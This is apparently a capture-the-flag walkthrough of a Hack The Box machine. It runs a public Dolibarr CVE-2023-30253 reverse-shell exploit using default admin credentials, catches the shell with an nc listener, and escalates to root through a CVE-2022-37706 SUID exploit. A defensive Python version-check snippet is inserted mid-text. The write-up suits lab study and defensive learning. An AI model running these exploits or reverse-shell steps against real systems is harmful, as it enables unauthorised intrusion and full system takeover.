└──╼ [★]$ nmap -sV 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 06:53 CDT
Nmap scan report for 
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└──╼ [★]$ echo " crm.board.htb" | sudo tee -a /etc/hosts
 crm.board.htb
Visiting crm.board.htb in a browser shows a login page. The page title is Dolibarr, so I looked up what that is:
---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit

┌─[sg-vip-2]─[]─[kazma@htb-jejtlehtvs]─[~/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└──╼ [★]$ python3 exploit.py http://crm.board.htb admin admin  4444
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell...
Press Ctrl+C after successful connection
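The exploit banner above states the affected range (Dolibarr <= 17.0.0) and the run shows it only works with a valid login (admin/admin here). From the defender's side, the two things to check are therefore the installed version and whether default credentials are still in place. The following is an added example, not part of the writeup or of the exploit repository: a small version-range check that pulls a Dolibarr version out of a page title or banner and reports whether it falls inside the range the exploit targets. The function names (parse_version, is_affected, assess), the constant LAST_AFFECTED and the sample banner strings are all my own construction.

```python
import re
from typing import Optional, Tuple

# Per the exploit banner quoted above, CVE-2023-30253 affects Dolibarr
# releases up to and including 17.0.0. Assumption: this is the only range
# we track; anything newer is reported as outside the affected range.
LAST_AFFECTED = (17, 0, 0)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract a major.minor[.patch] triple from free text such as an HTML
    <title> or a banner line. Returns None when no version string is found."""
    m = re.search(r"\b(\d+)\.(\d+)(?:\.(\d+))?\b", text)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def is_affected(version: Tuple[int, int, int]) -> bool:
    """Tuple comparison gives correct ordering for (major, minor, patch)."""
    return version <= LAST_AFFECTED


def assess(banner: str) -> str:
    """Human-readable verdict for one banner/title string."""
    version = parse_version(banner)
    if version is None:
        return "unknown: no version string found"
    label = ".".join(str(n) for n in version)
    state = "AFFECTED" if is_affected(version) else "not affected"
    return f"Dolibarr {label}: {state} by CVE-2023-30253"


if __name__ == "__main__":
    # Constructed sample inputs, not captured from the target in the writeup.
    samples = [
        "Login - Dolibarr 17.0.0",
        "Login - Dolibarr 17.0.1",
        "Login - Dolibarr 16.0.5",
        "Login page with the version hidden",
    ]
    for s in samples:
        print(assess(s))
```

The check is deliberately conservative: a title with no version at all is reported as unknown rather than safe, because Dolibarr can be configured to hide its version, and an instance that hides it still needs to be verified some other way (for example from the package or source tree on the host itself). Patching past 17.0.0 closes this particular issue, and removing the default admin/admin credentials removes the precondition the exploit relied on.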
Reverse shell:
└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 44222
bash: cannot set terminal process group (893): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
└──╼ [★]$ ssh [email protected]
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
[email protected]'s password:
larissa@boardlight:~$ vi exploit.sh
larissa@boardlight:~$ chmod +x exploit.sh
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# find / -name "root.txt"
/root/root.txt